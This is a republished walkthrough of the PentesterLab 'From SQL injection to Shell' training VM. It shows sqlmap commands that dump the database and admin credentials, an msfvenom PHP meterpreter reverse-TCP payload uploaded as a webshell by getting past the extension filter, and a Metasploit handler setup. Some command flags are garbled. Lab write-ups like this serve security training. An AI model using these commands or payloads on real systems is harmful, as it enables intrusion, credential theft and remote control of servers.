未加星标

Hack the Pentester Lab: from SQL injection to Shell VM

字体大小 | |
[系统(linux) 所属分类 系统(linux) | 发布者 店小二03 | 时间 2017 | 作者 红领巾 ] 0人收藏点击收藏

Today we are going to perform penetration testing in another lab, download it from here . Now install the iso image in VM ware and start it. The task given in this lab is to gain access of administration console and uploadphp webshell.

Start your Kali linux then open the terminal and type netdiscover command for scanning network. Here 192.168.0.105 is my target IP which is shown in the screenshot. Then explore this IP in browser


Hack the Pentester Lab: from SQL injection to Shell VM

When you will open target IP in browser you will get a web page having heading My Awesome Photoblog . On the top of left side it contains some tags: home; test; ruxcon; 2010; all pictures; admin. Now Click on test .


Hack the Pentester Lab: from SQL injection to Shell VM

The above URL : http://192.168.1.105/cat.php?id=1 will run query for ID 1 now let try to find out whether the above URL is vulnerable to sql injection or not by adding ‘ at last of URL:

http://192.168.1.105/cat.php?id=1 ’ . And I have got a message of sql error.


Hack the Pentester Lab: from SQL injection to Shell VM

It confirms that this web page is suffering from sql vulnerability. Now I am making use of sqlmap tool to enumerate database name and then try to fetch entire data under that database. First of all type following command to enumerate database name:

sqlmap -u “192.168.0.105/cat.php?id=1” dbs


Hack the Pentester Lab: from SQL injection to Shell VM

If you remembered the title of web page was “A Awesome Photoblog” hence name of database must be photoblog .


Hack the Pentester Lab: from SQL injection to Shell VM

Now let’s fetch entire data under photoblog database through following command:

sqlmap u “ 192.168.0.105/cat.php?id=1 ” D photoblog dump-all


Hack the Pentester Lab: from SQL injection to Shell VM

The first task was to gain access of administration console for which we required the login: password of his account. Through sqlmap command we have got login as admin and password as P4ssw0rd


Hack the Pentester Lab: from SQL injection to Shell VM

Now try to use above credential to access administration console, again open target IP: 192.168.0.105 in browser and click on login tab and type login as admin and password as P4ssw0rd.


Hack the Pentester Lab: from SQL injection to Shell VM

Congrats!!! The first task is completed.

Now last task is to upload PHP webshell. Under administration console you will see a link Add a new picture to upload an image in this web server. Click on Add a new picture to upload image.


Hack the Pentester Lab: from SQL injection to Shell VM

Here we can upload image through Add option now I will try to upload PHP webshell instead of picture.


Hack the Pentester Lab: from SQL injection to Shell VM

Let’s prepare the malicious file that you would upload with msfvenom :

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.0.104 lport=4444 -f raw.

Copy the code from<?phptodie()and save it in a file with .pHP extension . I have saved the backdoor as shell.pHP on desktop and will later browser this file to upload on web server.

Now load metasploit framework by typing msfconsole and start multi/handler

Move back to admin account and then give title “shell” , click on browse to browse shell.pHP and then click on Add .

Note: it will reject the file if you saved the file as shell.php, used capital letter for extension like: PHP, pHP .


Hack the Pentester Lab: from SQL injection to Shell VM

Our malicious file successfully uploaded on web server. You can see a new row is added as shell which contains our backdoor shell.pHP , now to execute backdoor click on shell and you will get reverse connection at multi handler.


Hack the Pentester Lab: from SQL injection to Shell VM

msf> use multi/handler

msf exploit( handler ) > set payload php/meterpreter/reverse_tcp

msf exploit( handler ) > set lport 4444

msf exploit( handler ) > set lhost 192.168.0.104

msf exploit( handler ) > exploit

meterpreter>sysinfo

Wonderful!!! We completed our last challenge also here we have victim web shell.


Hack the Pentester Lab: from SQL injection to Shell VM

Author : AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

本文系统(linux)相关术语:linux系统 鸟哥的linux私房菜 linux命令大全 linux操作系统

主题: SQLPHPLinux
分页:12
转载请注明
本文标题:Hack the Pentester Lab: from SQL injection to Shell VM
本站链接:http://www.codesec.net/view/522610.html
分享请点击:


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 系统(linux) | 评论(0) | 阅读(40)